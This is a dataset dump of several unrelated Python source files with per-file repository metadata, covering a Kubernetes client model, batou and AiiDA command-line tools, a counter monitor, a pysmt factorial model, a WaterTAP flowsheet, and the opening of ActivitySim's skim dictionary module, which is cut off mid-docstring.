"""Returns true if both objects are not equal"""
if not isinstance(other, V1EphemeralContainer):
return True
return self.to_dict() != other.to_dict()
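# Usage sketch (not part of the generated module): build an ephemeral debug
# container and read it back through to_dict(), which keys the result by the
# snake_case names in openapi_types. The image and container names below are
# illustrative values only.
if __name__ == "__main__":
    container = V1EphemeralContainer(
        name="debugger",
        image="busybox:1.35",
        command=["sh"],
        stdin=True,
        tty=True,
        target_container_name="app",
    )
    # prints "app": to_dict() mirrors the attribute names, not the JSON keys
    print(container.to_dict()["target_container_name"])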
| 45.191892
| 860
| 0.68112
|
8f77ebfc1eb1f57c8972ea052d11de4c85a4e110
| 397
|
py
|
Python
|
examples/tutorial-component/components/tick/component.py
|
frlan/batou
|
895960fb1a7fc14c1a2bfbbca13d96d6ec8b0f53
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
examples/tutorial-component/components/tick/component.py
|
frlan/batou
|
895960fb1a7fc14c1a2bfbbca13d96d6ec8b0f53
|
[
"BSD-2-Clause-FreeBSD"
] | 5
|
2021-03-20T05:08:49.000Z
|
2021-06-02T03:20:17.000Z
|
examples/tutorial-component/components/tick/component.py
|
ZeitOnline/batou
|
cade3526e7979a53d47bb020c5191702972ff2ff
|
[
"BSD-2-Clause-FreeBSD"
] | null | null | null |
from batou.component import Component
from batou.lib.file import File
class Tick(Component):
def configure(self):
tick = File('tick.sh',
source='tick.sh',
mode=0o755)
self += tick
self.provide('programs',
dict(name='tick',
path=tick.path,
priority=10))
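# Illustrative counterpart (not part of the original tutorial file): another
# component can pick up the value published above through batou's
# provide/require pairing. The Supervisor component and what it does with the
# 'programs' entries are hypothetical; only the require() call mirrors the
# provide() call in Tick.
class Supervisor(Component):
    def configure(self):
        # require() gathers everything any component provided under the
        # 'programs' key, i.e. the name/path/priority dicts from Tick.
        self.programs = self.require('programs')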
| 24.8125
| 41
| 0.476071
|
4ca67006d1a58a39ac3a9da27d569c0cfeb8face
| 2,535
|
py
|
Python
|
TensorArtist/tartist/core/utils/concurrent_monitor.py
|
cosmic119/DiscoGAN
|
5a86f36f45a3dafdc028fc2100eb477e54dc83cd
|
[
"MIT"
] | null | null | null |
TensorArtist/tartist/core/utils/concurrent_monitor.py
|
cosmic119/DiscoGAN
|
5a86f36f45a3dafdc028fc2100eb477e54dc83cd
|
[
"MIT"
] | null | null | null |
TensorArtist/tartist/core/utils/concurrent_monitor.py
|
cosmic119/DiscoGAN
|
5a86f36f45a3dafdc028fc2100eb477e54dc83cd
|
[
"MIT"
] | null | null | null |
# -*- coding:utf8 -*-
# File : concurrent_monitor.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 6/21/17
#
# This file is part of TensorArtist.
import itertools
import threading
import collections
import time
__all__ = ['TSCounter', 'TSCounterMonitor']
class TSCounter(object):
def __init__(self):
self._cnt = itertools.count()
self._ref = itertools.count()
self._iter_cnt = iter(self._cnt)
self._iter_ref = iter(self._ref)
def tick(self):
next(self._iter_cnt)
def get(self):
ref = next(self._iter_ref)
cnt = next(self._iter_cnt)
return cnt - ref
class TSCounterMonitor(object):
_displayer = None
def __init__(self, counters=None, display_names=None, interval=1, printf=None):
if counters is None:
counters = ['DEFAULT']
self._display_names = display_names
self._counters = collections.OrderedDict([(n, TSCounter()) for n in counters])
self._interval = interval
self._printf = printf
if self._printf is None:
from ..logger import get_logger
logger = get_logger(__file__)
self._printf = logger.info
@property
def _counter_names(self):
return list(self._counters.keys())
def tick(self, name=None):
if len(self._counter_names) == 1:
self._counters[self._counter_names[0]].tick()
else:
            assert name is not None, 'Must provide name if there are multiple counters.'
self._counters[name].tick()
def start(self):
self._displayer = threading.Thread(target=self._display_thread, daemon=True)
self._displayer.start()
return self
def _display(self, deltas, interval):
names = self._display_names or self._counter_names
if len(names) == 1:
self._printf('Counter monitor {}: {} ticks/s.'.format(names[0], deltas[0]/interval))
else:
log_strs = ['Counter monitor:']
for n, v in zip(names, deltas):
log_strs.append('\t{}: {} ticks/s'.format(n, v/interval))
self._printf('\n'.join(log_strs))
def _display_thread(self):
prev = [c.get() for _, c in self._counters.items()]
while True:
time.sleep(self._interval)
curr = [c.get() for _, c in self._counters.items()]
deltas = [c - p for p, c in zip(prev, curr)]
prev = curr
self._display(deltas, self._interval)
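# Usage sketch (not part of the original module): tick the single default
# counter from the main thread while the monitor's daemon thread reports the
# rate once per interval. The print-based printf and the loop bound are
# illustrative only.
if __name__ == '__main__':
    monitor = TSCounterMonitor(interval=1, printf=print).start()
    for _ in range(10 ** 6):
        monitor.tick()
    time.sleep(2)  # give the display thread a chance to report at least once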
| 30.178571
| 96
| 0.601972
|
c8ad1b9ec2dc304d68592908619834cc252a3c15
| 3,687
|
py
|
Python
|
h/cli/commands/user.py
|
kevinjalbert/h
|
0f260bf59847f27eff720eeb3c3b2468571412b2
|
[
"BSD-2-Clause"
] | 1
|
2020-06-19T01:49:39.000Z
|
2020-06-19T01:49:39.000Z
|
h/cli/commands/user.py
|
kevinjalbert/h
|
0f260bf59847f27eff720eeb3c3b2468571412b2
|
[
"BSD-2-Clause"
] | 5
|
2020-03-24T18:14:50.000Z
|
2022-03-02T06:56:50.000Z
|
h/cli/commands/user.py
|
liquidinvestigations/hypothesis-h
|
2eebc0b20823fc5bc42a8e8c33551a6d448ad6ba
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
import click
import sqlalchemy
from h import models
@click.group()
def user():
"""Manage users."""
@user.command()
@click.option("--username", prompt=True)
@click.option("--email", prompt=True)
@click.option("--authority")
@click.password_option()
@click.pass_context
def add(ctx, username, email, password, authority):
"""Create a new user."""
request = ctx.obj["bootstrap"]()
signup_service = request.find_service(name="user_signup")
signup_kwargs = {
"username": username,
"email": email,
"password": password,
"require_activation": False,
}
if authority:
signup_kwargs["authority"] = authority
signup_service.signup(**signup_kwargs)
try:
request.tm.commit()
except sqlalchemy.exc.IntegrityError as err:
upstream_error = "\n".join(" " + line for line in str(err).split("\n"))
message = "could not create user due to integrity constraint.\n\n{}".format(
upstream_error
)
raise click.ClickException(message)
click.echo("{username} created".format(username=username), err=True)
@user.command()
@click.argument("username")
@click.option("--authority")
@click.option("--on/--off", default=True)
@click.pass_context
def admin(ctx, username, authority, on):
"""
Make a user an admin.
You must specify the username of a user which you wish to give
administrative privileges.
"""
request = ctx.obj["bootstrap"]()
if not authority:
authority = request.default_authority
user = models.User.get_by_username(request.db, username, authority)
if user is None:
msg = 'no user with username "{}" and authority "{}"'.format(
username, authority
)
raise click.ClickException(msg)
user.admin = on
request.tm.commit()
click.echo(
"{username} is now {status}an administrator".format(
username=username, status="" if on else "NOT "
),
err=True,
)
@user.command()
@click.argument("username")
@click.option("--authority")
@click.password_option()
@click.pass_context
def password(ctx, username, authority, password):
"""
Change user's password.
You must specify the username of a user whose password you want to change.
"""
request = ctx.obj["bootstrap"]()
password_service = request.find_service(name="user_password")
if not authority:
authority = request.default_authority
user = models.User.get_by_username(request.db, username, authority)
if user is None:
msg = 'no user with username "{}" and authority "{}"'.format(
username, authority
)
raise click.ClickException(msg)
password_service.update_password(user, password)
request.tm.commit()
click.echo("Password changed for {}".format(username), err=True)
@user.command()
@click.argument("username")
@click.option("--authority")
@click.pass_context
def delete(ctx, username, authority):
"""
    Delete a user along with all their group memberships and annotations.
You must specify the username of a user to delete.
"""
request = ctx.obj["bootstrap"]()
if not authority:
authority = request.default_authority
user = models.User.get_by_username(request.db, username, authority)
if user is None:
msg = 'no user with username "{}" and authority "{}"'.format(
username, authority
)
raise click.ClickException(msg)
svc = request.find_service(name="delete_user")
svc.delete(user)
request.tm.commit()
click.echo("User {} deleted.".format(username), err=True)
| 25.964789
| 84
| 0.64741
|
594ff91750ef735aa69fdc0c53c9ce879eeec78d
| 4,114
|
py
|
Python
|
benchmarks/nonlinear_software/f3/factorial.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 3
|
2021-04-23T23:29:26.000Z
|
2022-03-23T10:00:30.000Z
|
benchmarks/nonlinear_software/f3/factorial.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | null | null | null |
benchmarks/nonlinear_software/f3/factorial.py
|
EnricoMagnago/F3
|
c863215c318d7d5f258eb9be38c6962cf6863b52
|
[
"MIT"
] | 1
|
2021-11-17T22:02:56.000Z
|
2021-11-17T22:02:56.000Z
|
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.fnode import FNode
from utils import symb_to_next
def transition_system(env: PysmtEnv) -> (frozenset, FNode, FNode, FNode):
assert isinstance(env, PysmtEnv)
mgr = env.formula_manager
fact = mgr.Symbol("fact", types.INT)
i = mgr.Symbol("i", types.INT)
n = mgr.Symbol("n", types.INT)
pc = mgr.Symbol("pc", types.INT)
x_fact = symb_to_next(mgr, fact)
x_i = symb_to_next(mgr, i)
x_n = symb_to_next(mgr, n)
x_pc = symb_to_next(mgr, pc)
symbols = frozenset([fact, i, n, pc])
n_locs = 6
int_bound = n_locs
pcs = []
x_pcs = []
ints = [mgr.Int(i) for i in range(int_bound)]
    for l in range(n_locs):
        # bind to a fresh name: reusing `n` here would shadow the state
        # symbol of the same name used by the cfg and labels formulas below
        loc = ints[l]
        pcs.append(mgr.Equals(pc, loc))
        x_pcs.append(mgr.Equals(x_pc, loc))
m_1 = mgr.Int(-1)
pcend = mgr.Equals(pc, m_1)
x_pcend = mgr.Equals(x_pc, m_1)
# initial location.
init = pcs[0]
# control flow graph.
cfg = mgr.And(
# pc = -1 : -1,
mgr.Implies(pcend, x_pcend),
# pc = 0 & !(n >= 1) : -1,
mgr.Implies(mgr.And(pcs[0], mgr.Not(mgr.GE(n, ints[1]))), x_pcend),
# pc = 0 & n >= 1 : 1,
mgr.Implies(mgr.And(pcs[0], mgr.GE(n, ints[1])), x_pcs[1]),
# pc = 1 : 2,
mgr.Implies(pcs[1], x_pcs[2]),
# pc = 2 : 3,
mgr.Implies(pcs[2], x_pcs[3]),
# pc = 3 & !(i <= fact) : -1,
mgr.Implies(mgr.And(pcs[3], mgr.Not(mgr.LE(i, fact))), x_pcend),
# pc = 3 & i <= fact : 4,
mgr.Implies(mgr.And(pcs[3], mgr.LE(i, fact)), x_pcs[4]),
# pc = 4 : 5,
mgr.Implies(pcs[4], x_pcs[5]),
# pc = 5 : 3,
mgr.Implies(pcs[5], x_pcs[3]))
# transition labels.
labels = mgr.And(
# (pc = -1 & pc' = -1) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcend, x_pcend),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 0 & pc' = -1) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcs[0], x_pcend),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 0 & pc' = 1) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcs[0], x_pcs[1]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 1 & pc' = 2) -> (n' = n & i' = i & fact' = 2),
mgr.Implies(
mgr.And(pcs[1], x_pcs[2]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, ints[2]))),
# (pc = 2 & pc' = 3) -> (n' = n & i' = 1 & fact' = fact),
mgr.Implies(
mgr.And(pcs[2], x_pcs[3]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, ints[1]),
mgr.Equals(x_fact, fact))),
# (pc = 3 & pc' = -1) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcs[3], x_pcend),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 3 & pc' = 4) -> (n' = n & i' = i & fact' = fact),
mgr.Implies(
mgr.And(pcs[3], x_pcs[4]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, fact))),
# (pc = 4 & pc' = 5) -> (n' = n & i' = i & fact' = fact*i),
mgr.Implies(
mgr.And(pcs[4], x_pcs[5]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, i),
mgr.Equals(x_fact, mgr.Times(fact, i)))),
# (pc = 5 & pc' = 3) -> (n' = n & i' = i+1 & fact' = fact),
mgr.Implies(
mgr.And(pcs[5], x_pcs[3]),
mgr.And(mgr.Equals(x_n, n), mgr.Equals(x_i, mgr.Plus(i, ints[1])),
mgr.Equals(x_fact, fact))))
# transition relation.
trans = mgr.And(cfg, labels)
# fairness.
fairness = mgr.Not(pcend)
return symbols, init, trans, fairness
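# Usage sketch (not part of the original benchmark): build the encoding and
# inspect the four returned pieces. serialize() and symbol_name() are
# standard pysmt FNode/Symbol API; nothing beyond this module's own imports
# is required.
if __name__ == "__main__":
    env = PysmtEnv()
    symbols, init, trans, fairness = transition_system(env)
    print(sorted(s.symbol_name() for s in symbols))
    print(init.serialize())
    print(fairness.serialize())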
| 36.087719
| 78
| 0.478123
|
498bbcf45328df67e5c452a7a072e5cc8ce11b94
| 1,211
|
py
|
Python
|
app/core/models.py
|
RogerITData/recipe-app-api
|
c96cc46d7bbf28ebd525a9ba94507d02abfe0251
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
RogerITData/recipe-app-api
|
c96cc46d7bbf28ebd525a9ba94507d02abfe0251
|
[
"MIT"
] | null | null | null |
app/core/models.py
|
RogerITData/recipe-app-api
|
c96cc46d7bbf28ebd525a9ba94507d02abfe0251
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager,\
PermissionsMixin
class UserManager(BaseUserManager):
def create_user(self, email, password=None, **extra_fields):
"""Creates and saves a new user"""
if not email:
raise ValueError('Users must have an email address')
user = self.model(email=self.normalize_email(email), **extra_fields)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email, password):
"""Creates and save a new superuser"""
user = self.create_user(email, password)
user.is_staff = True
user.is_superuser = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
"""Custom user model that support using email instead of username"""
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_staff = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
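# Usage sketch (not part of the original module): with Django settings
# configured (e.g. inside `python manage.py shell`), the custom manager
# replaces the username-based default. The credentials are illustrative.
#
#   user = User.objects.create_user(email='test@example.com', password='pass123')
#   admin = User.objects.create_superuser('admin@example.com', 'supersecret')
#   assert admin.is_staff and admin.is_superuser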
| 31.868421
| 76
| 0.668043
|
1f1f58312704dd4b88096f01aa0cb630f43f0c62
| 1,238
|
py
|
Python
|
py/rows.py
|
timm/misc
|
2326989a8b8599283f8f16a6b8595d916850e392
|
[
"BSD-2-Clause"
] | null | null | null |
py/rows.py
|
timm/misc
|
2326989a8b8599283f8f16a6b8595d916850e392
|
[
"BSD-2-Clause"
] | null | null | null |
py/rows.py
|
timm/misc
|
2326989a8b8599283f8f16a6b8595d916850e392
|
[
"BSD-2-Clause"
] | 1
|
2019-04-17T02:21:40.000Z
|
2019-04-17T02:21:40.000Z
|
import re
# init a thing
# decide type of things
# coerce type in strings
# return a row with ids and x and y
# i need x, y
class eg(object):
id=0
  def __init__(i, egs, xs=None, ys=None):
    eg.id = i.id = eg.id + 1
    # None defaults avoid the shared-mutable-default-argument pitfall
    i.xs, i.ys, i.egs = xs or [], ys or [], egs
class egs(object):
ignore = "?"
less = "<"
more = ">"
klass = "!"
ys = "<>!"
def __init__(i):
i.klass = None
i.xs, i.ys, i.less, i.more = [],[],[],[]
def also(i,c):
if egs.less in c.name : i.less += [c]
    elif egs.more in c.name : i.more += [c]
elif egs.klass in c.name : i.klass = c
return c
def rows(i,file):
for cnt,(xs,ys) in enumerate(xy(rows(file))):
if cnt==0:
i.xs = [ col(x,n) for n,x in enumerate(xs)]
i.ys = [i.also(col(y,n)) for n,y in enumerate(ys)]
else:
yield eg(i, xs=xs, ys=ys)
class col(object):
def __init__(i, name,pos):
i.name, i.pos = name, pos
    i.log = None   # place to keep stats about a number
    i.prep = None  # coercion function: string to something
def train(i, z, n=1):
    if z == egs.ignore: return z
if not i.log:
z, i.prep = atom(z)
i.log = bins() if i.prep == str else around()
    i.log.train(i.prep(z), n)  # coerce raw strings before logging
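# Missing-helper sketch (not in the original file): train() unpacks
# `z, i.prep = atom(z)` and later compares i.prep against str, so atom is
# assumed to return the coerced value together with the coercion function.
# xy(), rows(), bins() and around() remain undefined here and are left as-is.
def atom(z):
  for coerce in (int, float):
    try:
      return coerce(z), coerce
    except ValueError:
      pass
  return z, str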
| 24.76
| 58
| 0.526656
|
3fd4e1f725569e04e20742c77a12f629b59549a8
| 4,792
|
py
|
Python
|
aiida/cmdline/commands/cmd_database.py
|
azadoks/aiida-core
|
b806b7fef8fc79090deccfe2019b77cb922e0581
|
[
"MIT",
"BSD-3-Clause"
] | 180
|
2019-07-12T07:45:26.000Z
|
2022-03-22T13:16:57.000Z
|
aiida/cmdline/commands/cmd_database.py
|
azadoks/aiida-core
|
b806b7fef8fc79090deccfe2019b77cb922e0581
|
[
"MIT",
"BSD-3-Clause"
] | 2,325
|
2019-07-04T13:41:44.000Z
|
2022-03-31T12:17:10.000Z
|
aiida/cmdline/commands/cmd_database.py
|
azadoks/aiida-core
|
b806b7fef8fc79090deccfe2019b77cb922e0581
|
[
"MIT",
"BSD-3-Clause"
] | 88
|
2019-07-06T01:42:39.000Z
|
2022-03-18T14:20:09.000Z
|
# -*- coding: utf-8 -*-
###########################################################################
# Copyright (c), The AiiDA team. All rights reserved. #
# This file is part of the AiiDA code. #
# #
# The code is hosted on GitHub at https://github.com/aiidateam/aiida-core #
# For further information on the license, see the LICENSE.txt file #
# For further information please visit http://www.aiida.net #
###########################################################################
"""`verdi database` commands."""
# pylint: disable=unused-argument
import click
from aiida.backends.general.migrations.duplicate_uuids import TABLES_UUID_DEDUPLICATION
from aiida.cmdline.commands.cmd_verdi import verdi
from aiida.cmdline.params import options
from aiida.cmdline.utils import decorators
@verdi.group('database')
def verdi_database():
"""Inspect and manage the database.
.. deprecated:: v2.0.0
"""
@verdi_database.command('version')
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'The same information is now available through `verdi status`.\n'
)
def database_version():
"""Show the version of the database.
The database version is defined by the tuple of the schema generation and schema revision.
.. deprecated:: v2.0.0
"""
@verdi_database.command('migrate')
@options.FORCE()
@click.pass_context
@decorators.deprecated_command(
'This command has been deprecated and will be removed soon (in v3.0). '
'Please call `verdi storage migrate` instead.\n'
)
def database_migrate(ctx, force):
"""Migrate the database to the latest schema version.
.. deprecated:: v2.0.0
"""
from aiida.cmdline.commands.cmd_storage import storage_migrate
ctx.forward(storage_migrate)
@verdi_database.group('integrity')
def verdi_database_integrity():
"""Check the integrity of the database and fix potential issues.
.. deprecated:: v2.0.0
"""
@verdi_database_integrity.command('detect-duplicate-uuid')
@click.option(
'-t',
'--table',
type=click.Choice(TABLES_UUID_DEDUPLICATION),
default='db_dbnode',
help='The database table to operate on.'
)
@click.option(
'-a', '--apply-patch', is_flag=True, help='Actually apply the proposed changes instead of performing a dry run.'
)
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'For remaining available integrity checks, use `verdi storage integrity` instead.\n'
)
def detect_duplicate_uuid(table, apply_patch):
"""Detect and fix entities with duplicate UUIDs.
Before aiida-core v1.0.0, there was no uniqueness constraint on the UUID column of the node table in the database
and a few other tables as well. This made it possible to store multiple entities with identical UUIDs in the same
table without the database complaining. This bug was fixed in aiida-core=1.0.0 by putting an explicit uniqueness
constraint on UUIDs on the database level. However, this would leave databases created before this patch with
duplicate UUIDs in an inconsistent state. This command will run an analysis to detect duplicate UUIDs in a given
table and solve it by generating new UUIDs. Note that it will not delete or merge any rows.
.. deprecated:: v2.0.0
"""
@verdi_database_integrity.command('detect-invalid-links')
@decorators.with_dbenv()
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'For remaining available integrity checks, use `verdi storage integrity` instead.\n'
)
def detect_invalid_links():
"""Scan the database for invalid links.
.. deprecated:: v2.0.0
"""
@verdi_database_integrity.command('detect-invalid-nodes')
@decorators.with_dbenv()
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'For remaining available integrity checks, use `verdi storage integrity` instead.\n'
)
def detect_invalid_nodes():
"""Scan the database for invalid nodes.
.. deprecated:: v2.0.0
"""
@verdi_database.command('summary')
@decorators.deprecated_command(
'This command has been deprecated and no longer has any effect. It will be removed soon from the CLI (in v2.1).\n'
'Please call `verdi storage info` instead.\n'
)
def database_summary():
"""Summarise the entities in the database.
.. deprecated:: v2.0.0
"""
| 36.030075
| 118
| 0.6851
|
e2e0830fb7849389dc6ad79c2aed0156c70388e4
| 354
|
py
|
Python
|
programmers/str_to_int.py
|
sssunda/solve_algorithms
|
cb630d3b1d7f4bae0115ecb45d9a9b4f2e1eff27
|
[
"MIT"
] | null | null | null |
programmers/str_to_int.py
|
sssunda/solve_algorithms
|
cb630d3b1d7f4bae0115ecb45d9a9b4f2e1eff27
|
[
"MIT"
] | null | null | null |
programmers/str_to_int.py
|
sssunda/solve_algorithms
|
cb630d3b1d7f4bae0115ecb45d9a9b4f2e1eff27
|
[
"MIT"
] | null | null | null |
# def solution(s):
# answer = int(s)
# return answer
# Try implementing it without converting the whole string with int()
def solution(s):
answer = 0
for idx, num in enumerate(s[::-1]):
if num == '-':
answer *= -1
else:
answer += int(num) * (10 ** idx)
return answer
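# A variant sketch that avoids int() entirely by converting each digit character
# with ord(); tolerating a leading '+' sign is an assumption beyond the original
# solution above.
def solution_without_int(s):
    answer = 0
    for idx, num in enumerate(s[::-1]):
        if num == '-':
            answer *= -1
        elif num == '+':
            continue
        else:
            answer += (ord(num) - ord('0')) * (10 ** idx)
    return answer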
if __name__ == '__main__':
s = '-1234'
print(solution(s))
| 16.857143
| 44
| 0.474576
|
a2f476557b023f7c27e396738445f160b5b09203
| 5,972
|
py
|
Python
|
watertap/examples/flowsheets/full_treatment_train/analysis/flowsheet_NF.py
|
srikanthallu/watertap
|
6ad5552b91163917fb19342754b9b57b3d9cbd85
|
[
"BSD-3-Clause-LBNL"
] | 4
|
2021-11-06T01:13:22.000Z
|
2022-02-08T21:16:38.000Z
|
watertap/examples/flowsheets/full_treatment_train/analysis/flowsheet_NF.py
|
srikanthallu/watertap
|
6ad5552b91163917fb19342754b9b57b3d9cbd85
|
[
"BSD-3-Clause-LBNL"
] | 233
|
2021-10-13T12:53:44.000Z
|
2022-03-31T21:59:50.000Z
|
watertap/examples/flowsheets/full_treatment_train/analysis/flowsheet_NF.py
|
srikanthallu/watertap
|
6ad5552b91163917fb19342754b9b57b3d9cbd85
|
[
"BSD-3-Clause-LBNL"
] | 12
|
2021-11-01T19:11:03.000Z
|
2022-03-08T22:20:58.000Z
|
###############################################################################
# WaterTAP Copyright (c) 2021, The Regents of the University of California,
# through Lawrence Berkeley National Laboratory, Oak Ridge National
# Laboratory, National Renewable Energy Laboratory, and National Energy
# Technology Laboratory (subject to receipt of any required approvals from
# the U.S. Dept. of Energy). All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and license
# information, respectively. These files are also available online at the URL
# "https://github.com/watertap-org/watertap/"
#
###############################################################################
from pyomo.environ import (
ConcreteModel,
Objective,
Expression,
Constraint,
Param,
TransformationFactory,
value,
units as pyunits,
)
from pyomo.network import Arc
from pyomo.util import infeasible
from idaes.core import FlowsheetBlock
from idaes.core.util.scaling import (
calculate_scaling_factors,
unscaled_constraints_generator,
unscaled_variables_generator,
badly_scaled_var_generator,
)
from idaes.core.util.initialization import propagate_state
from watertap.examples.flowsheets.full_treatment_train.flowsheet_components import (
pretreatment_NF,
desalination,
gypsum_saturation_index,
translator_block,
costing,
)
from watertap.examples.flowsheets.full_treatment_train.model_components import (
property_models,
)
from watertap.examples.flowsheets.full_treatment_train.util import (
solve_block,
check_dof,
)
def build_components(m, has_bypass=True):
# build flowsheet
property_models.build_prop(m, base="ion")
pretrt_port = pretreatment_NF.build_pretreatment_NF(
m, NF_type="ZO", NF_base="ion", has_bypass=has_bypass
)
property_models.build_prop(m, base="TDS")
translator_block.build_tb(
m, base_inlet="ion", base_outlet="TDS", name_str="tb_pretrt_to_desal"
)
# Arc to translator block
m.fs.s_pretrt_tb = Arc(
source=pretrt_port["out"], destination=m.fs.tb_pretrt_to_desal.inlet
)
property_models.build_prop(m, base="eNRTL")
gypsum_saturation_index.build(m, section="pretreatment")
m.fs.NF.area.fix(175)
if has_bypass:
m.fs.splitter.split_fraction[0, "bypass"].fix(0.50)
m.fs.removal_Ca = Expression(
expr=(
m.fs.feed.properties[0].flow_mass_phase_comp["Liq", "Ca"]
- m.fs.mixer.mixed_state[0].flow_mass_phase_comp["Liq", "Ca"]
)
/ m.fs.feed.properties[0].flow_mass_phase_comp["Liq", "Ca"]
)
m.fs.removal_Mg = Expression(
expr=(
m.fs.feed.properties[0].flow_mass_phase_comp["Liq", "Mg"]
- m.fs.mixer.mixed_state[0].flow_mass_phase_comp["Liq", "Mg"]
)
/ m.fs.feed.properties[0].flow_mass_phase_comp["Liq", "Mg"]
)
def build(m, has_bypass=True):
"""
Build a flowsheet with nanofiltration as the pretreatment process.
"""
build_components(m, has_bypass=has_bypass)
# annual water production
m.fs.treated_flow_vol = Expression(
expr=m.fs.tb_pretrt_to_desal.properties_out[0].flow_vol
)
costing.build_costing(m, NF_type="ZO")
return m
def scale(m, has_bypass=True):
pretreatment_NF.scale_pretreatment_NF(
m, NF_type="ZO", NF_base="ion", has_bypass=has_bypass
)
calculate_scaling_factors(m.fs.tb_pretrt_to_desal)
def initialize(m, has_bypass=True):
optarg = {"nlp_scaling_method": "user-scaling"}
pretreatment_NF.initialize_pretreatment_NF(
m, NF_type="ZO", NF_base="ion", has_bypass=has_bypass
)
m.fs.pretrt_saturation.properties.initialize(optarg=optarg)
propagate_state(m.fs.s_pretrt_tb)
m.fs.tb_pretrt_to_desal.initialize(optarg=optarg)
def report(m, has_bypass=True):
pretreatment_NF.display_pretreatment_NF(
m, NF_type="ZO", NF_base="ion", has_bypass=has_bypass
)
m.fs.tb_pretrt_to_desal.report()
def solve_flowsheet(has_bypass=True):
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
build(m, has_bypass=has_bypass)
TransformationFactory("network.expand_arcs").apply_to(m)
# scale
scale(m, has_bypass=has_bypass)
calculate_scaling_factors(m)
# initialize
initialize(m, has_bypass=has_bypass)
check_dof(m)
solve_block(m, tee=True, fail_flag=True)
# report
report(m, has_bypass=has_bypass)
return m
def simulate(m, check_termination=True):
return solve_block(m, tee=False, fail_flag=check_termination)
def set_optimization_components(m, system_recovery, **kwargs):
# unfix variables
m.fs.splitter.split_fraction[0, "bypass"].unfix()
m.fs.splitter.split_fraction[0, "bypass"].setlb(0.001)
m.fs.splitter.split_fraction[0, "bypass"].setub(0.99)
m.fs.NF.area.unfix()
m.fs.NF.area.setlb(0.1)
m.fs.NF.area.setub(1000)
m.fs.max_conc_factor_target = Param(initialize=3.5, mutable=True)
m.fs.eq_max_conc_NF = Constraint(
expr=m.fs.NF.feed_side.properties_out[0].mass_frac_phase_comp["Liq", "Ca"]
<= m.fs.max_conc_factor_target
* m.fs.feed.properties[0].mass_frac_phase_comp["Liq", "Ca"]
)
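    # Illustrative numbers (assumed, not taken from the model): with the default
    # max_conc_factor_target of 3.5 and a feed Ca mass fraction of 4e-4, this
    # constraint caps the NF concentrate Ca mass fraction at 3.5 * 4e-4 = 1.4e-3.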
def set_up_optimization(m, system_recovery=0.50, **kwargs):
set_optimization_components(m, system_recovery, **kwargs)
calculate_scaling_factors(m)
check_dof(m, 2)
def optimize(m, check_termination=True):
return solve_block(m, tee=True, fail_flag=check_termination)
def optimize_flowsheet(system_recovery=0.50, **kwargs):
m = solve_flowsheet(**kwargs)
set_up_optimization(m, system_recovery=system_recovery, **kwargs)
optimize(m)
print("===================================" "\n Optimization ")
report(m, **kwargs)
return m
if __name__ == "__main__":
m = solve_flowsheet(True)
| 30.625641
| 84
| 0.6785
|
587eaab89ea47cbe63547e92a1ad83f750c531a7
| 28,562
|
py
|
Python
|
activitysim/core/skim_dictionary.py
|
albabnoor/activitysim
|
a57efa1418320cb88d72ad5f413aaa45131183a4
|
[
"BSD-3-Clause"
] | null | null | null |
activitysim/core/skim_dictionary.py
|
albabnoor/activitysim
|
a57efa1418320cb88d72ad5f413aaa45131183a4
|
[
"BSD-3-Clause"
] | null | null | null |
activitysim/core/skim_dictionary.py
|
albabnoor/activitysim
|
a57efa1418320cb88d72ad5f413aaa45131183a4
|
[
"BSD-3-Clause"
] | null | null | null |
# ActivitySim
# See full license in LICENSE.txt.
from builtins import range
from builtins import object
import logging
import numpy as np
import pandas as pd
from activitysim.core.util import quick_loc_series
logger = logging.getLogger(__name__)
NOT_IN_SKIM_ZONE_ID = -1
NOT_IN_SKIM_NAN = np.nan
ROW_MAJOR_LAYOUT = True
class OffsetMapper(object):
"""
Utility to map skim zone ids to ordinal offsets (e.g. numpy array indices)
Can map either by a fixed offset (e.g. -1 to map 1-based to 0-based)
or by an explicit mapping of zone id to offset (slower but more flexible)
Internally, there are two representations:
offset_int:
int offset which when added to zone_id yields skim array index (e.g. -1 to map 1-based zones to 0-based index)
offset_series:
